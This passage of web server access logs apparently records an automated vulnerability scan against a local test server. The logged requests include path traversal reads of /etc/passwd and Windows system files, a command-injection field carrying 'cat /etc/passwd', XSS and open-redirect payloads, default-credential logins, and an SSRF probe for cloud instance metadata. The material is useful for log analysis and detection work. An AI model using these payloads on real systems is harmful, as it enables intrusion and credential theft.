"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web-console/ServerInfo.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/snp/snoop.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /druid/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /control/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //http://127.0.0.1example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/diagnostic.html?t=201701020919", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /keycloak.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp?user=j%22;-alert(1)-%22x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/console?.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/afr.php?refresh=10000&\x22)',10000000);alert(1337);setTimeout('alert(\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor_tools/module?type=files/admin\x22>¶ms=filetype=images HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=C:\x5CWindows\x5Csystem.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET \x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\x22;user|s.\x221337\x22; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"alibaba.interact.sh","request":"GET http://alibaba.interact.sh/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.067","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /groovyconsole HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/showLogon.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zentao/index.php?mode=getconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:23 +0000","request_body":"username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} 